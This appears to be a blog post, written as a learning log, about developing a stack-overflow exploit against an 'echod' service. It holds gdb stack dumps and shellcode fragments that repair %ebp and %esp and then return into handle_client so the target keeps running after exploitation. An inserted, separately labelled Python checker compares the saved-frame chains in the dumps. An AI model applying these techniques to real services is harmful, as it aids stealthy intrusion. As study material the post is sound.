Stack Rebuilding
Well, as for the "next target", I've selected visigoth's "fucktcpd". But that's another post. Right now I wanted to share a little about rebuilding echod's stack so it returned properly.

*) Start with the basics (I know nothing about this, so I'm feeling my way): Returning in the program
A quick backtrace from the "reverse_echo_cmd" sub (using the debugger gdb) shows that returning correctly should send the instruction pointer to 0x804916a.
Hmmmmm, I know that at the beginning of each sub is a

push %ebp
mov %esp,%ebp

and checking the contents of the stack shows the address at %ebp+4, aka 0x4(%ebp):

13: x/32xw $ebp - 92
0xbfaedeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf2c: 0x00000000 0xbfaedf50 0x0804c6bb 0x0804c6bc
0xbfaedf3c: 0x00000000 0xbfaedfec 0x08054700 0xbfaedfb8
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
(%ebp is 0xbfaedf48, the word holding the saved frame pointer 0xbfaedfb8, and 0x4(%ebp) is 0xbfaedf4c, holding the return address 0x0804916a)
We already knew this since that's the address we had to overwrite. We'll refer to this snippet later on as we clean up the stack.

So I set a breakpoint at the "leave" instruction for this sub. Then, allow the instruction to execute using "si".
I'm next left with the stack looking like this:

14: x/32xw $esp
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
13: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
(The top part shows the stack starting at %esp. The bottom views the stack so that %ebp, here 0xbfaedfb8, is on the right side of the sixth row, or the third from the bottom. In case you can't tell, these are two of my favorite "display" settings in gdb.)

Key point: See our favorite address at the very top of the stack. After poking around, the "leave" instruction reverses the beginning of the sub:

mov %ebp, %esp
pop %ebp


All that's left to do after that is to return to the calling function...
So, when we're done with the shellcode, we'll simply push 0x804916a and then ret... Let's try it:

push $0x804916a
ret


This did indeed return me into handle_client where we left off, but I get a segfault soon thereafter.
Hmmm... it appears we have trashed the stack, and must do some rebuilding.

Here's directly from my notes (forgive the laziness here, just want to include as much as possible and I've still got a lot of work and learning to do):

Learned:

*) Returning back into the program is not hard... simply "push (ret address)" and "ret".
*) Apparently, "leave" (executed directly before "ret") cleans up local variables and pops off %ebp, roughly like this:

mov %ebp, %esp
mov 0x0(%ebp), %ebp

(the real "pop %ebp" also adds 4 to %esp after loading it)
*) Returning back into the program *correctly* is not so easy... the stack must be in decent condition, and %ebp must be repaired...
*) While I'm able to overwrite %ebp with a typical value, the multithreading makes this part more difficult.
*) Instead, I'm trying the following approach within my shellcode:
14: 54 push %esp
15: 5d pop %ebp
16: 81 c5 a5 01 01 01 add $0x10101a4,%ebp # + A4, size of the stack for handle_client, the calling sub
1c: 81 ed 01 01 01 01 sub $0x1010101,%ebp #
22: 89 6d 01 mov %ebp,0x1(%ebp)
25: 83 45 01 30 addl $0x30,0x1(%ebp)
29: 45 inc %ebp
2a: 68 6a 91 04 08 push $0x804916a
2f: c3 ret

*) A multithreaded app creates difficulties both for returning into shellcode and for returning gracefully....
*) Multithreading causes issues with %ebp as well.
*) Each thread has its own stack space: 0xbfaexxxx for one thread, 0xbfadxxxx for another.
*) %ebp points to the previous frame's saved %ebp, which is what makes backtraces simple?


First off, let's compare a *normal* leave/ret stack with the smashed version....

(SPLOIT)
Breakpoint 2, 0x0804916a in handle_client ()
10: x/32xw $esp
0xbfaedf50: 0x00000005 0x00000002 0xbfaedf70 0x00000000
0xbfaedf60: 0x00000000 0x00000000 0x0804a748 0x00000002
0xbfaedf70: 0x0804a900 0x0804a904 0x00000000 0x00000000
0xbfaedf80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedfa0: 0x00000000 0xbfaedf70 0x00000425 0x00000005
0xbfaedfb0: 0x00000000 0xbfaedfd4 0xbfaedfd8 0x2807faf1
0xbfaedfc0: 0xbfbfecbc 0x00000000 0x00000000 0x00000000
9: x/32xw $ebp - 92
0xbfaedf58: 0xbfaedf70 0x00000000 0x00000000 0x00000000
0xbfaedf68: 0x0804a748 0x00000002 0x0804a900 0x0804a904
0xbfaedf78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf98: 0x00000000 0x00000000 0x00000000 0xbfaedf70
0xbfaedfa8: 0x00000425 0x00000005 0x00000000 0xbfaedfd4
0xbfaedfb8: 0xbfaedfd8 0x2807faf1 0xbfbfecbc 0x00000000
0xbfaedfc8: 0x00000000 0x00000000 0x00000000 0x280964bc
8: /x $eax = 0x2
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x1
5: /x $edx = 0x0
4: /x $edi = 0x8
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x286
1: x/i $pc 0x804916a <handle_client+206>: add $0x10,%esp
(gdb) ni
(GOOD)
Breakpoint 2, 0x0804916a in handle_client ()
10: x/32xw $esp
0xbfaedf50: 0x00000005 0x00000002 0xbfaedf70 0x00000000
0xbfaedf60: 0x00000000 0x00000000 0x0804a748 0x00000002
0xbfaedf70: 0x0804a900 0x0804a904 0x00000000 0x00000000
0xbfaedf80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedfa0: 0x00000000 0xbfaedf70 0x00000019 0x00000005
0xbfaedfb0: 0x00000000 0x00000000 0xbfaedfd8 0x2807faf1
0xbfaedfc0: 0xbfbfecbc 0x00000000 0x00000000 0x00000000
9: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x00000019
0xbfaedfac: 0x00000005 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecbc 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
8: /x $eax = 0x800
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x804c100
5: /x $edx = 0x8054600
4: /x $edi = 0x8054700
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x282
1: x/i $pc 0x804916a : add $0x10,%esp
(gdb)
(pre-"REVERSE")
8: /x $eax = 0x8048f24
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x2815f454
5: /x $edx = 0x0
4: /x $edi = 0x8054900
3: /x $esi = 0xbfaddfec
2: /x $eflags = 0x296
1: x/i $pc 0x8049168 : call *%eax

----------------------------(post-"REVERSE", normal input)
Breakpoint 2, 0x0804916a in handle_client ()
8: /x $eax = 0x800
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x804c100
5: /x $edx = 0x8054600
4: /x $edi = 0x8054700
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x282
1: x/i $pc 0x804916a : add $0x10,%esp
----------------------------(post-"REVERSE", sploit)
Breakpoint 2, 0x0804916a in handle_client ()
8: /x $eax = 0x2
7: /x $ebx = 0xbfaddf08
6: /x $ecx = 0x1
5: /x $edx = 0x0
4: /x $edi = 0x9
3: /x $esi = 0xbfaddfec
2: /x $eflags = 0x286
1: x/i $pc 0x804916a : add $0x10,%esp
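Added example, not from the original post: a small Python checker that loads the GOOD and SPLOIT "x/32xw $ebp - 92" dumps above as constructed memory images, derives %ebp from the display's base (base + 92), and follows the saved %ebp chain the way a backtrace does, stopping at the first frame whose saved %ebp or return address cannot be right. The thread-stack bounds STACK_LO/STACK_HI are an assumption taken from the 0xbfaexxxx addresses in the dumps, and anything outside the 32 dumped words is treated as unreadable.

```python
GOOD = (0xbfaedf5c, [        # base of "x/32xw $ebp - 92", normal input run
    0x00000000, 0x00000000, 0x00000000, 0x0804a748,
    0x00000002, 0x0804a900, 0x0804a904, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0xbfaedf70, 0x00000019,
    0x00000005, 0x00000000, 0x00000000, 0xbfaedfd8,
    0x2807faf1, 0xbfbfecbc, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x280964bc, 0x00000000])
SPLOIT = (0xbfaedf58, [      # same display, run with the shellcode
    0xbfaedf70, 0x00000000, 0x00000000, 0x00000000,
    0x0804a748, 0x00000002, 0x0804a900, 0x0804a904,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0xbfaedf70,
    0x00000425, 0x00000005, 0x00000000, 0xbfaedfd4,
    0xbfaedfd8, 0x2807faf1, 0xbfbfecbc, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x280964bc])
STACK_LO, STACK_HI = 0xbfae0000, 0xbfaf0000  # assumed thread-stack bounds

def read_word(image, addr):
    """32-bit word at addr, or None when addr is outside the dumped window."""
    base, words = image
    off = addr - base
    if off < 0 or off % 4 or off // 4 >= len(words):
        return None
    return words[off // 4]

def walk_frames(image):
    """Follow saved %ebp -> caller's %ebp like a backtrace; innermost %ebp is
    the dump base + 92 (gdb showed $ebp - 92). A frame is (ebp, saved, ret)."""
    ebp, frames = image[0] + 92, []
    while True:
        saved, ret = read_word(image, ebp), read_word(image, ebp + 4)
        frames.append((ebp, saved, ret))
        if ret is not None and STACK_LO <= ret < STACK_HI:
            return frames, f"corrupt: return slot holds stack address {ret:#010x}"
        if saved == 0:
            return frames, "ok: chain ends at the thread's first frame"
        if saved is None or saved <= ebp or saved & 3 or not STACK_LO <= saved < STACK_HI:
            return frames, f"corrupt: saved %ebp {saved!r} is unreadable or not a higher stack slot"
        ebp = saved

if __name__ == "__main__":
    for name, image in (("GOOD", GOOD), ("SPLOIT", SPLOIT)):
        frames, verdict = walk_frames(image)
        print(f"{name}: {len(frames)} frame(s) walked, {verdict}")
```

On the GOOD image the chain walks two frames and ends at a zero saved %ebp; on the SPLOIT image the first frame already has a stack address (0xbfaedfd8) in its return slot, because the repaired %ebp (0xbfaedfb4) sits one word below the normal one (0xbfaedfb8).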
# PRE: 53 push %ebx

# 14: 83 c4 58 add $0x58,%esp (clean up esp)
# 15: 5b pop %ebx (clean up ebx for thread-kill)
# 17: 54 push %esp (clean up ebp)
# 18: 5d pop %ebp # "
# 19: 81 c5 68 01 01 01 add $0x1010168,%ebp # + A4 -1
# 1f: 81 ed 01 01 01 01 sub $0x1010101,%ebp # "
# 25: 89 6d 01 mov %ebp,0x1(%ebp) # "
# 27: 83 45 01 21 addl $0x21,0x1(%ebp) # "
# 2c: 45 inc %ebp (done cleaning up ebp)
# 2d: 68 6a 91 04 08 push $0x804916a (return into handle_client)
# 32: c3 ret (go!)
#